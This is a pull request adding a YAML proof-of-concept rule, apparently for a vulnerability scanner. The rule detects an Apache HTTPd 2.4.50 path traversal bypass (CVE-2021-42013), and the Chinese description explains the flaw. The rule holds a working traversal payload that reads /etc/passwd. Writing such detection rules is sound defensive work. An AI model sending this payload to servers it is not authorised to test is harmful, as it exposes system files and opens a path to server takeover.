### PR TITLE
apache-cve-2021-42013

### DIFF
--- a/pocs/apache-cve-2021-42013.yml
+++ b/pocs/apache-cve-2021-42013.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-apache-cve-2021-42013
+rules:
+  - method: GET
+    path: /cgi-bin/..;/..;/..;/..;/etc/passwd
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: D(https://github.com/szd79056181)
+  links:
+    - https://mp.weixin.qq.com/s/IqyelR29uE0G33-wtYQkvA


### PR DESCRIPTION


## 本 poc 是检测什么漏洞的

该漏洞为CVE-2021-42013的绕过


Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新，披露了 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善，攻击者可构造恶意请求绕过补丁，利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持，攻击者可构造恶意请求执行命令，控制服务器。阿里云应急响应中心提醒 Apache HTTPd 用户尽快采取安全措施阻止漏洞攻击。


## 测试环境

Apache HTTPd 2.4.50

![图片](https://user-images.githubusercontent.com/8935032/136495900-595ab231-a518-400a-9b68-3ebf1d7bc2cd.png)


## 备注

![图片](https://user-images.githubusercontent.com/8935032/136495943-93c43bea-302a-4267-95fd-72ba0148990d.png)

